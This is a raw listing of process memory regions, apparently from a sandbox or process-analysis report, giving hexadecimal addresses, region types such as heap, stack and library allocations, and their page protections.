trusted library allocation
|
page read and write
|
||
|
3F97000
|
trusted library allocation
|
page execute and read and write
|
||
|
336D000
|
heap
|
page read and write
|
||
|
8D41000
|
trusted library allocation
|
page read and write
|
||
|
909A000
|
trusted library allocation
|
page read and write
|
||
|
8D70000
|
trusted library allocation
|
page read and write
|
||
|
8F3E000
|
trusted library allocation
|
page read and write
|
||
|
7130000
|
trusted library allocation
|
page read and write
|
||
|
4130000
|
trusted library allocation
|
page execute and read and write
|
||
|
6750000
|
trusted library allocation
|
page read and write
|
||
|
2CC9000
|
trusted library allocation
|
page read and write
|
||
|
6D01000
|
heap
|
page read and write
|
||
|
A8BF000
|
unclassified section
|
page execute read
|
||
|
A890000
|
unclassified section
|
page readonly
|
||
|
81C9000
|
heap
|
page read and write
|
||
|
701E000
|
stack
|
page read and write
|
||
|
518B000
|
trusted library allocation
|
page read and write
|
||
|
C02A000
|
unclassified section
|
page readonly
|
||
|
5F41000
|
trusted library allocation
|
page read and write
|
||
|
7CDC000
|
trusted library allocation
|
page read and write
|
||
|
7B70000
|
trusted library allocation
|
page read and write
|
||
|
6CFE000
|
stack
|
page read and write
|
||
|
8F2A000
|
trusted library allocation
|
page read and write
|
||
|
9D5A000
|
trusted library allocation
|
page read and write
|
||
|
6D51000
|
heap
|
page read and write
|
||
|
72D0000
|
trusted library allocation
|
page read and write
|
||
|
601B000
|
trusted library allocation
|
page read and write
|
||
|
21B57F5D000
|
heap
|
page read and write
|
||
|
6FA0000
|
trusted library allocation
|
page read and write
|
||
|
8FB0000
|
trusted library allocation
|
page read and write
|
||
|
8089000
|
trusted library allocation
|
page read and write
|
||
|
824F000
|
stack
|
page read and write
|
||
|
8300000
|
trusted library allocation
|
page read and write
|
||
|
8D9A000
|
trusted library allocation
|
page read and write
|
||
|
90C8000
|
trusted library allocation
|
page read and write
|
||
|
7020000
|
trusted library allocation
|
page read and write
|
||
|
4250000
|
heap
|
page execute and read and write
|
||
|
80E0000
|
trusted library allocation
|
page read and write
|
||
|
2CD0000
|
trusted library allocation
|
page read and write
|
||
|
8D20000
|
trusted library section
|
page read and write
|
||
|
6C1E000
|
stack
|
page read and write
|
||
|
7030000
|
trusted library allocation
|
page read and write
|
||
|
72C7000
|
trusted library allocation
|
page read and write
|
||
|
7430000
|
heap
|
page execute and read and write
|
||
|
5A70000
|
trusted library allocation
|
page read and write
|
||
|
6FD0000
|
trusted library allocation
|
page read and write
|
||
|
32FE000
|
stack
|
page read and write
|
||
|
4740000
|
trusted library allocation
|
page read and write
|
||
|
618E000
|
trusted library allocation
|
page read and write
|
||
|
3FC5000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F70000
|
trusted library allocation
|
page read and write
|
||
|
5F77000
|
trusted library allocation
|
page read and write
|
||
|
AD81000
|
unclassified section
|
page execute read
|
||
|
7DFF000
|
heap
|
page read and write
|
||
|
8F6C000
|
trusted library allocation
|
page read and write
|
||
|
80D5000
|
trusted library allocation
|
page read and write
|
||
|
76CD000
|
stack
|
page read and write
|
||
|
7F37000
|
stack
|
page read and write
|
||
|
7CD0000
|
trusted library allocation
|
page read and write
|
||
|
21B55FC2000
|
heap
|
page read and write
|
||
|
8D56000
|
trusted library allocation
|
page read and write
|
||
|
8D2C000
|
trusted library allocation
|
page read and write
|
||
|
825E000
|
stack
|
page read and write
|
||
|
8D5C000
|
trusted library allocation
|
page read and write
|
||
|
3318000
|
heap
|
page read and write
|
||
|
8FBC000
|
trusted library allocation
|
page read and write
|
||
|
7D0000
|
heap
|
page read and write
|
||
|
8D38000
|
trusted library allocation
|
page read and write
|
||
|
8FF0000
|
trusted library allocation
|
page read and write
|
||
|
8E1C000
|
trusted library allocation
|
page read and write
|
||
|
6ADE000
|
stack
|
page read and write
|
||
|
49FF000
|
stack
|
page read and write
|
||
|
1D0000
|
heap
|
page read and write
|
||
|
8000000
|
trusted library allocation
|
page read and write
|
||
|
6FC0000
|
trusted library allocation
|
page read and write
|
||
|
8DD6000
|
trusted library allocation
|
page read and write
|
||
|
722E000
|
stack
|
page read and write
|
||
|
5691000
|
trusted library allocation
|
page read and write
|
||
|
3FBA000
|
trusted library allocation
|
page execute and read and write
|
||
|
907C000
|
trusted library allocation
|
page read and write
|
||
|
7B80000
|
trusted library allocation
|
page read and write
|
||
|
6B4E000
|
stack
|
page read and write
|
||
|
8F18000
|
trusted library allocation
|
page read and write
|
||
|
9683000
|
trusted library allocation
|
page read and write
|
||
|
66FD000
|
stack
|
page read and write
|
||
|
619E000
|
trusted library allocation
|
page read and write
|
||
|
6D31000
|
heap
|
page read and write
|
||
|
2B92000
|
trusted library allocation
|
page read and write
|
||
|
8F96000
|
trusted library allocation
|
page read and write
|
||
|
6FB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6BCD000
|
stack
|
page read and write
|
||
|
8EB2000
|
trusted library allocation
|
page read and write
|
||
|
7ADD000
|
stack
|
page read and write
|
||
|
5B01000
|
trusted library allocation
|
page read and write
|
||
|
7EE0000
|
heap
|
page read and write
|
||
|
8E00000
|
trusted library allocation
|
page read and write
|
||
|
7BA0000
|
trusted library allocation
|
page read and write
|
||
|
80AB000
|
trusted library allocation
|
page read and write
|
||
|
7066000
|
trusted library allocation
|
page read and write
|
||
|
4672000
|
trusted library allocation
|
page read and write
|
||
|
7060000
|
trusted library allocation
|
page read and write
|
||
|
3290000
|
trusted library allocation
|
page read and write
|
||
|
8D7C000
|
trusted library allocation
|
page read and write
|
||
|
401E000
|
stack
|
page read and write
|
||
|
74A0000
|
trusted library allocation
|
page read and write
|
||
|
9046000
|
trusted library allocation
|
page read and write
|
||
|
8775000
|
heap
|
page read and write
|
||
|
7B20000
|
trusted library allocation
|
page execute and read and write
|
||
|
72B9000
|
trusted library allocation
|
page read and write
|
||
|
3FC0000
|
trusted library allocation
|
page read and write
|
||
|
7496000
|
heap
|
page read and write
|
||
|
666E000
|
stack
|
page read and write
|
||
|
402E000
|
stack
|
page read and write
|
||
|
2DDB000
|
heap
|
page read and write
|
||
|
6D41000
|
heap
|
page read and write
|
||
|
3320000
|
trusted library allocation
|
page execute and read and write
|
||
|
6CBE000
|
stack
|
page read and write
|
||
|
8E3A000
|
trusted library allocation
|
page read and write
|
||
|
683A000
|
stack
|
page read and write
|
||
|
908C000
|
trusted library allocation
|
page read and write
|
||
|
7D95000
|
heap
|
page read and write
|
||
|
7CB0000
|
heap
|
page read and write
|
||
|
302C000
|
heap
|
page read and write
|
||
|
7530000
|
trusted library allocation
|
page read and write
|
||
|
7060000
|
trusted library allocation
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
8EBA000
|
trusted library allocation
|
page read and write
|
||
|
7B60000
|
trusted library allocation
|
page read and write
|
||
|
21B57F5A000
|
heap
|
page read and write
|
||
|
12C000
|
stack
|
page read and write
|
||
|
90F000
|
stack
|
page read and write
|
||
|
75A4000
|
trusted library allocation
|
page read and write
|
||
|
408F000
|
stack
|
page read and write
|
||
|
8967000
|
trusted library allocation
|
page read and write
|
||
|
6E5E000
|
stack
|
page read and write
|
||
|
9040000
|
trusted library allocation
|
page read and write
|
||
|
B4FF000
|
trusted library allocation
|
page read and write
|
||
|
2D5A000
|
heap
|
page read and write
|
||
|
9292000
|
trusted library allocation
|
page read and write
|
||
|
64E6000
|
trusted library allocation
|
page read and write
|
||
|
738000
|
heap
|
page read and write
|
||
|
8030000
|
trusted library allocation
|
page read and write
|
||
|
47E000
|
heap
|
page read and write
|
||
|
3292000
|
trusted library allocation
|
page read and write
|
||
|
77C9000
|
heap
|
page read and write
|
||
|
90E0000
|
trusted library allocation
|
page read and write
|
||
|
8DBC000
|
trusted library allocation
|
page read and write
|
||
|
8707000
|
heap
|
page read and write
|
||
|
820000
|
trusted library allocation
|
page read and write
|
||
|
6E0000
|
heap
|
page read and write
|
||
|
4320000
|
heap
|
page read and write
|
||
|
77A0000
|
trusted library allocation
|
page read and write
|
||
|
8FA2000
|
trusted library allocation
|
page read and write
|
||
|
8E5A000
|
trusted library allocation
|
page read and write
|
||
|
4D71000
|
trusted library allocation
|
page read and write
|
||
|
16D000
|
stack
|
page read and write
|
||
|
ADAF000
|
unclassified section
|
page execute read
|
||
|
A29A000
|
trusted library allocation
|
page execute and read and write
|
||
|
7D5E000
|
stack
|
page read and write
|
||
|
A891000
|
unclassified section
|
page execute read
|
||
|
4C54000
|
trusted library allocation
|
page read and write
|
||
|
2BEE000
|
stack
|
page read and write
|
||
|
8D82000
|
trusted library allocation
|
page read and write
|
||
|
8EE8000
|
trusted library allocation
|
page read and write
|
||
|
8E21000
|
trusted library allocation
|
page read and write
|
||
|
445E000
|
stack
|
page read and write
|
||
|
2D21000
|
heap
|
page read and write
|
||
|
6E10000
|
trusted library allocation
|
page read and write
|
||
|
4690000
|
trusted library allocation
|
page read and write
|
||
|
4775000
|
heap
|
page execute and read and write
|
||
|
7BF0000
|
trusted library allocation
|
page read and write
|
||
|
721E000
|
heap
|
page read and write
|
||
|
470000
|
heap
|
page read and write
|
||
|
7490000
|
trusted library allocation
|
page read and write
|
||
|
7543000
|
heap
|
page read and write
|
||
|
7430000
|
trusted library allocation
|
page execute and read and write
|
||
|
6DDCAFA000
|
stack
|
page read and write
|
||
|
7C10000
|
trusted library allocation
|
page read and write
|
||
|
6CE0000
|
heap
|
page read and write
|
||
|
8D34000
|
trusted library allocation
|
page read and write
|
||
|
821D000
|
stack
|
page read and write
|
||
|
7BD0000
|
trusted library allocation
|
page read and write
|
||
|
21B56205000
|
heap
|
page read and write
|
||
|
2D10000
|
trusted library allocation
|
page read and write
|
||
|
2CEB000
|
heap
|
page read and write
|
||
|
31BE000
|
stack
|
page read and write
|
||
|
AE0000
|
heap
|
page read and write
|
||
|
6A4E000
|
stack
|
page read and write
|
||
|
6730000
|
trusted library allocation
|
page read and write
|
||
|
3FA5000
|
trusted library allocation
|
page execute and read and write
|
||
|
6E40000
|
trusted library allocation
|
page read and write
|
||
|
7540000
|
trusted library allocation
|
page read and write
|
||
|
9F01000
|
trusted library allocation
|
page read and write
|
||
|
8BC000
|
heap
|
page read and write
|
||
|
6F40000
|
trusted library allocation
|
page read and write
|
||
|
4060000
|
heap
|
page readonly
|
||
|
8FC0000
|
trusted library allocation
|
page read and write
|
||
|
8FB6000
|
trusted library allocation
|
page read and write
|
||
|
6AFE000
|
stack
|
page read and write
|
||
|
57B000
|
heap
|
page read and write
|
||
|
8310000
|
trusted library allocation
|
page read and write
|
||
|
8E78000
|
trusted library allocation
|
page read and write
|
||
|
7C90000
|
trusted library allocation
|
page execute and read and write
|
||
|
8E92000
|
unclassified section
|
page read and write
|
||
|
540F000
|
trusted library allocation
|
page read and write
|
||
|
A8B1000
|
unclassified section
|
page execute read
|
||
|
8F41000
|
trusted library allocation
|
page read and write
|
||
|
6F85000
|
trusted library allocation
|
page read and write
|
||
|
6FC0000
|
trusted library allocation
|
page read and write
|
||
|
90BC000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
heap
|
page read and write
|
||
|
6EDE000
|
stack
|
page read and write
|
||
|
ADAB000
|
unclassified section
|
page execute read
|
||
|
850000
|
trusted library allocation
|
page read and write
|
||
|
AF3000
|
trusted library allocation
|
page execute and read and write
|
||
|
A52A000
|
trusted library allocation
|
page execute and read and write
|
||
|
3F9D000
|
trusted library allocation
|
page execute and read and write
|
||
|
8D88000
|
trusted library allocation
|
page read and write
|
||
|
3FB0000
|
trusted library allocation
|
page read and write
|
||
|
6E59000
|
heap
|
page read and write
|
||
|
B0B3000
|
trusted library allocation
|
page read and write
|
||
|
40A000
|
heap
|
page read and write
|
||
|
72FE000
|
stack
|
page read and write
|
||
|
4FDC000
|
stack
|
page read and write
|
||
|
7F58000
|
heap
|
page read and write
|
||
|
6E16000
|
trusted library allocation
|
page read and write
|
||
|
7ED7000
|
stack
|
page read and write
|
||
|
4140000
|
trusted library allocation
|
page read and write
|
||
|
6D1A000
|
stack
|
page read and write
|
||
|
712D000
|
stack
|
page read and write
|
||
|
5859000
|
trusted library allocation
|
page read and write
|
||
|
82D9000
|
trusted library allocation
|
page read and write
|
||
|
81A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3FC0000
|
trusted library allocation
|
page read and write
|
||
|
7BC0000
|
trusted library allocation
|
page read and write
|
||
|
7C4E000
|
stack
|
page read and write
|
||
|
509F000
|
stack
|
page read and write
|
||
|
9F0000
|
heap
|
page read and write
|
||
|
90B6000
|
trusted library allocation
|
page read and write
|
||
|
6E27000
|
heap
|
page read and write
|
||
|
74D0000
|
trusted library allocation
|
page read and write
|
||
|
726C000
|
heap
|
page read and write
|
||
|
5110000
|
heap
|
page execute and read and write
|
||
|
4995000
|
heap
|
page execute and read and write
|
||
|
5C16000
|
trusted library allocation
|
page read and write
|
||
|
6C0B000
|
stack
|
page read and write
|
||
|
5AED000
|
trusted library allocation
|
page read and write
|
||
|
7B40000
|
trusted library allocation
|
page read and write
|
||
|
8914000
|
trusted library allocation
|
page read and write
|
||
|
8F1A000
|
trusted library allocation
|
page read and write
|
||
|
60E000
|
stack
|
page read and write
|
||
|
6E07000
|
trusted library allocation
|
page read and write
|
||
|
6C3E000
|
stack
|
page read and write
|
||
|
7576000
|
trusted library allocation
|
page read and write
|
||
|
929F000
|
trusted library allocation
|
page read and write
|
||
|
906E000
|
trusted library allocation
|
page read and write
|
||
|
8EFA000
|
trusted library allocation
|
page read and write
|
||
|
91C000
|
heap
|
page read and write
|
||
|
6F1F000
|
stack
|
page read and write
|
||
|
310E000
|
stack
|
page read and write
|
||
|
3F90000
|
trusted library allocation
|
page read and write
|
||
|
7DBC000
|
heap
|
page read and write
|
||
|
8F36000
|
trusted library allocation
|
page read and write
|
||
|
7BD0000
|
trusted library allocation
|
page read and write
|
||
|
64F000
|
stack
|
page read and write
|
||
|
4920000
|
heap
|
page read and write
|
||
|
7780000
|
trusted library allocation
|
page read and write
|
||
|
71A0000
|
trusted library allocation
|
page read and write
|
||
|
8159000
|
trusted library allocation
|
page read and write
|
||
|
8D64000
|
trusted library allocation
|
page read and write
|
||
|
6C7E000
|
stack
|
page read and write
|
||
|
8E8A000
|
trusted library allocation
|
page read and write
|
||
|
8FC6000
|
trusted library allocation
|
page read and write
|
||
|
8EBE000
|
trusted library allocation
|
page read and write
|
||
|
7B80000
|
trusted library allocation
|
page read and write
|
||
|
2D8C000
|
heap
|
page read and write
|
||
|
A3BD000
|
trusted library allocation
|
page read and write
|
||
|
8600000
|
trusted library allocation
|
page read and write
|
||
|
41BF000
|
stack
|
page read and write
|
||
|
9056000
|
trusted library allocation
|
page read and write
|
||
|
7040000
|
trusted library allocation
|
page read and write
|
||
|
7C00000
|
trusted library allocation
|
page read and write
|
||
|
8408000
|
trusted library allocation
|
page read and write
|
||
|
7D30000
|
trusted library allocation
|
page read and write
|
||
|
90A4000
|
trusted library allocation
|
page read and write
|
||
|
7A37000
|
stack
|
page read and write
|
||
|
8040000
|
trusted library allocation
|
page execute and read and write
|
||
|
6706000
|
trusted library allocation
|
page read and write
|
||
|
7BB0000
|
trusted library allocation
|
page read and write
|
||
|
6D32000
|
heap
|
page read and write
|
||
|
6DDCCFE000
|
stack
|
page read and write
|
||
|
7B49000
|
trusted library allocation
|
page read and write
|
||
|
90B7000
|
trusted library allocation
|
page read and write
|
||
|
877000
|
stack
|
page read and write
|
||
|
90D4000
|
trusted library allocation
|
page read and write
|
||
|
75EE000
|
stack
|
page read and write
|
||
|
7BE7000
|
trusted library allocation
|
page read and write
|
||
|
8DCA000
|
trusted library allocation
|
page read and write
|
||
|
21B55F60000
|
heap
|
page read and write
|
||
|
7F50000
|
trusted library allocation
|
page read and write
|
||
|
7A40000
|
heap
|
page read and write
|
||
|
940000
|
heap
|
page read and write
|
||
|
8E76000
|
trusted library allocation
|
page read and write
|
||
|
AB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
728E000
|
heap
|
page read and write
|
||
|
762E000
|
stack
|
page read and write
|
||
|
8F72000
|
trusted library allocation
|
page read and write
|
||
|
745A000
|
heap
|
page read and write
|
||
|
8D01000
|
trusted library allocation
|
page read and write
|
||
|
7071000
|
heap
|
page read and write
|
||
|
8E23000
|
trusted library allocation
|
page read and write
|
||
|
9010000
|
trusted library allocation
|
page read and write
|
||
|
84BE000
|
stack
|
page read and write
|
||
|
75AB000
|
stack
|
page read and write
|
||
|
6DF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
728000
|
heap
|
page read and write
|
||
|
8F1E000
|
trusted library allocation
|
page read and write
|
||
|
8EEA000
|
trusted library allocation
|
page read and write
|
||
|
82D0000
|
trusted library allocation
|
page read and write
|
||
|
83C000
|
stack
|
page read and write
|
||
|
8F5A000
|
trusted library allocation
|
page read and write
|
||
|
7550000
|
trusted library allocation
|
page execute and read and write
|
||
|
83D4000
|
unclassified section
|
page execute read
|
||
|
8E25000
|
trusted library allocation
|
page read and write
|
||
|
AD71000
|
unclassified section
|
page execute read
|
||
|
2D4C000
|
heap
|
page read and write
|
||
|
453E000
|
stack
|
page read and write
|
||
|
98E9000
|
trusted library allocation
|
page read and write
|
||
|
7BC0000
|
trusted library allocation
|
page read and write
|
||
|
573000
|
heap
|
page read and write
|
||
|
501E000
|
stack
|
page read and write
|
||
|
4ADD000
|
trusted library allocation
|
page read and write
|
||
|
8DB6000
|
trusted library allocation
|
page read and write
|
||
|
7267000
|
trusted library allocation
|
page read and write
|
||
|
2CF6000
|
heap
|
page read and write
|
||
|
6BDE000
|
stack
|
page read and write
|
||
|
3300000
|
heap
|
page readonly
|
||
|
7260000
|
trusted library allocation
|
page read and write
|
||
|
8D4C000
|
trusted library allocation
|
page read and write
|
||
|
7700000
|
trusted library allocation
|
page read and write
|
||
|
70AC000
|
stack
|
page read and write
|
||
|
9022000
|
trusted library allocation
|
page read and write
|
||
|
8FC9000
|
trusted library allocation
|
page read and write
|
||
|
890B000
|
trusted library allocation
|
page read and write
|
||
|
8D6E000
|
trusted library allocation
|
page read and write
|
||
|
7CD5000
|
trusted library allocation
|
page read and write
|
||
|
2C4B000
|
heap
|
page read and write
|
||
|
4667000
|
trusted library allocation
|
page execute and read and write
|
||
|
8D4A000
|
trusted library allocation
|
page read and write
|
||
|
4B05000
|
trusted library allocation
|
page read and write
|
||
|
8ECC000
|
trusted library allocation
|
page read and write
|
||
|
8015000
|
trusted library allocation
|
page read and write
|
||
|
4BA5000
|
trusted library allocation
|
page read and write
|
||
|
71BE000
|
heap
|
page read and write
|
||
|
6BBE000
|
stack
|
page read and write
|
||
|
6DB0000
|
heap
|
page read and write
|
||
|
6F76000
|
trusted library allocation
|
page read and write
|
||
|
7217000
|
heap
|
page read and write
|
||
|
8F48000
|
trusted library allocation
|
page read and write
|
||
|
7212000
|
heap
|
page read and write
|
||
|
9026000
|
trusted library allocation
|
page read and write
|
||
|
8DBC000
|
trusted library allocation
|
page read and write
|
||
|
9092000
|
trusted library allocation
|
page read and write
|
||
|
452B000
|
trusted library allocation
|
page read and write
|
||
|
729D000
|
heap
|
page read and write
|
||
|
ADF5000
|
unclassified section
|
page read and write
|
||
|
68C0000
|
heap
|
page read and write
|
||
|
6F9E000
|
stack
|
page read and write
|
||
|
8E6C000
|
trusted library allocation
|
page read and write
|
||
|
8EB4000
|
trusted library allocation
|
page read and write
|
||
|
4A10000
|
heap
|
page read and write
|
||
|
8761000
|
heap
|
page read and write
|
||
|
7F130000
|
trusted library allocation
|
page execute and read and write
|
||
|
317B000
|
heap
|
page read and write
|
||
|
4BA1000
|
trusted library allocation
|
page read and write
|
||
|
7010000
|
trusted library allocation
|
page read and write
|
||
|
81EB000
|
heap
|
page read and write
|
||
|
6FDD000
|
trusted library allocation
|
page read and write
|
||
|
7420000
|
trusted library allocation
|
page read and write
|
||
|
7310000
|
trusted library allocation
|
page read and write
|
||
|
7BF0000
|
trusted library allocation
|
page read and write
|
||
|
864D000
|
stack
|
page read and write
|
||
|
79CC000
|
trusted library allocation
|
page read and write
|
||
|
7D09000
|
trusted library allocation
|
page read and write
|
||
|
2C40000
|
heap
|
page read and write
|
||
|
7D40000
|
trusted library allocation
|
page read and write
|
||
|
842E000
|
stack
|
page read and write
|
||
|
8F4E000
|
trusted library allocation
|
page read and write
|
||
|
72AD000
|
stack
|
page read and write
|
||
|
748D000
|
stack
|
page read and write
|
||
|
90B0000
|
trusted library allocation
|
page read and write
|
||
|
2CB0000
|
trusted library allocation
|
page read and write
|
||
|
7CF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
69BA000
|
stack
|
page read and write
|
||
|
2CF0000
|
heap
|
page read and write
|
||
|
7B90000
|
trusted library allocation
|
page read and write
|
||
|
72E5000
|
trusted library allocation
|
page read and write
|
||
|
77FC000
|
stack
|
page read and write
|
||
|
6EAD000
|
stack
|
page read and write
|
||
|
AB8000
|
stack
|
page read and write
|
||
|
83F0000
|
trusted library allocation
|
page read and write
|
||
|
7D17000
|
trusted library allocation
|
page read and write
|
||
|
8C9D000
|
trusted library allocation
|
page read and write
|
||
|
2D5E000
|
stack
|
page read and write
|
||
|
40EC000
|
stack
|
page read and write
|
||
|
8E94000
|
trusted library allocation
|
page read and write
|
||
|
771D000
|
stack
|
page read and write
|
||
|
880000
|
heap
|
page read and write
|
||
|
6EDC000
|
heap
|
page read and write
|
||
|
698000
|
heap
|
page read and write
|
||
|
ADA7000
|
unclassified section
|
page execute read
|
||
|
3379000
|
heap
|
page read and write
|
||
|
9014000
|
trusted library allocation
|
page read and write
|
||
|
4855000
|
trusted library allocation
|
page read and write
|
||
|
2B87000
|
trusted library allocation
|
page execute and read and write
|
||
|
A40000
|
heap
|
page read and write
|
||
|
B178000
|
trusted library allocation
|
page read and write
|
||
|
97C000
|
heap
|
page read and write
|
||
|
7740000
|
trusted library allocation
|
page read and write
|
||
|
8EE4000
|
trusted library allocation
|
page read and write
|
||
|
46A0000
|
heap
|
page readonly
|
||
|
4521000
|
trusted library allocation
|
page read and write
|
||
|
76E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
841D000
|
unclassified section
|
page readonly
|
||
|
9E41000
|
trusted library allocation
|
page read and write
|
||
|
2D61000
|
heap
|
page read and write
|
||
|
8FF000
|
stack
|
page read and write
|
||
|
21B57F49000
|
heap
|
page read and write
|
||
|
8F46000
|
trusted library allocation
|
page read and write
|
||
|
8405000
|
trusted library allocation
|
page read and write
|
||
|
6F9B000
|
trusted library allocation
|
page read and write
|
||
|
7A90000
|
trusted library allocation
|
page read and write
|
||
|
8DBE000
|
trusted library allocation
|
page read and write
|
||
|
8E60000
|
trusted library allocation
|
page read and write
|
||
|
7500000
|
trusted library allocation
|
page read and write
|
||
|
694D000
|
stack
|
page read and write
|
||
|
8E9A000
|
trusted library allocation
|
page read and write
|
||
|
2B70000
|
trusted library allocation
|
page read and write
|
||
|
3250000
|
trusted library allocation
|
page read and write
|
||
|
90AC000
|
trusted library allocation
|
page read and write
|
||
|
8E18000
|
trusted library allocation
|
page read and write
|
||
|
48AE000
|
stack
|
page read and write
|
||
|
2D69000
|
stack
|
page read and write
|
||
|
5B09000
|
trusted library allocation
|
page read and write
|
||
|
760E000
|
stack
|
page read and write
|
||
|
86F0000
|
trusted library allocation
|
page read and write
|
||
|
8CEA000
|
trusted library allocation
|
page read and write
|
||
|
916000
|
heap
|
page read and write
|
||
|
7B50000
|
trusted library allocation
|
page execute and read and write
|
||
|
7510000
|
trusted library allocation
|
page read and write
|
||
|
8F42000
|
trusted library allocation
|
page read and write
|
||
|
8190000
|
heap
|
page read and write
|
||
|
8E22000
|
trusted library allocation
|
page read and write
|
||
|
A48000
|
heap
|
page read and write
|
||
|
904A000
|
trusted library allocation
|
page read and write
|
||
|
8010000
|
heap
|
page read and write
|
||
|
6743000
|
trusted library allocation
|
page read and write
|
||
|
AF3000
|
trusted library allocation
|
page execute and read and write
|
||
|
58C0000
|
trusted library allocation
|
page read and write
|
||
|
8674000
|
heap
|
page read and write
|
||
|
72D6000
|
trusted library allocation
|
page read and write
|
||
|
490C000
|
stack
|
page read and write
|
||
|
7FAD000
|
stack
|
page read and write
|
||
|
6FF0000
|
trusted library allocation
|
page read and write
|
||
|
A4B000
|
heap
|
page read and write
|
||
|
1D3000
|
heap
|
page read and write
|
||
|
716B000
|
stack
|
page read and write
|
||
|
872B000
|
heap
|
page read and write
|
||
|
6EDE000
|
stack
|
page read and write
|
||
|
3F9A000
|
trusted library allocation
|
page execute and read and write
|
||
|
8EC0000
|
trusted library allocation
|
page read and write
|
||
|
441C000
|
stack
|
page read and write
|
||
|
8F7A000
|
trusted library allocation
|
page read and write
|
||
|
8E58000
|
trusted library allocation
|
page read and write
|
||
|
33C3000
|
heap
|
page read and write
|
||
|
8E34000
|
trusted library allocation
|
page read and write
|
||
|
31FF000
|
stack
|
page read and write
|
||
|
4030000
|
heap
|
page readonly
|
||
|
7BBE000
|
trusted library allocation
|
page read and write
|
||
|
3FC2000
|
trusted library allocation
|
page read and write
|
||
|
A4E000
|
heap
|
page read and write
|
||
|
68AE000
|
stack
|
page read and write
|
||
|
7033000
|
trusted library allocation
|
page read and write
|
||
|
6DF5000
|
heap
|
page execute and read and write
|
||
|
AD61000
|
unclassified section
|
page execute read
|
||
|
6A2B000
|
stack
|
page read and write
|
||
|
ADB2000
|
unclassified section
|
page read and write
|
||
|
4A3E000
|
stack
|
page read and write
|
||
|
33FB000
|
heap
|
page read and write
|
||
|
3403000
|
heap
|
page read and write
|
||
|
8F20000
|
trusted library allocation
|
page read and write
|
||
|
8330000
|
trusted library allocation
|
page read and write
|
||
|
645B000
|
trusted library allocation
|
page read and write
|
||
|
46E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B8A000
|
trusted library allocation
|
page execute and read and write
|
||
|
7B59000
|
trusted library allocation
|
page read and write
|
||
|
7B0D000
|
stack
|
page read and write
|
||
|
90DC000
|
trusted library allocation
|
page read and write
|
||
|
83A0000
|
trusted library allocation
|
page read and write
|
||
|
8DEE000
|
trusted library allocation
|
page read and write
|
||
|
90D0000
|
trusted library allocation
|
page read and write
|
||
|
8650000
|
heap
|
page read and write
|
||
|
6E39000
|
trusted library allocation
|
page read and write
|
||
|
7470000
|
trusted library allocation
|
page read and write
|
||
|
7A80000
|
trusted library allocation
|
page read and write
|
||
|
47C000
|
stack
|
page read and write
|
||
|
ACF000
|
stack
|
page read and write
|
||
|
7EB0000
|
trusted library allocation
|
page read and write
|
||
|
4B9000
|
stack
|
page read and write
|
||
|
8F8C000
|
trusted library allocation
|
page read and write
|
||
|
8F60000
|
trusted library allocation
|
page read and write
|
||
|
9D0A000
|
trusted library allocation
|
page read and write
|
||
|
7140000
|
trusted library allocation
|
page read and write
|
||
|
8D0C000
|
trusted library allocation
|
page read and write
|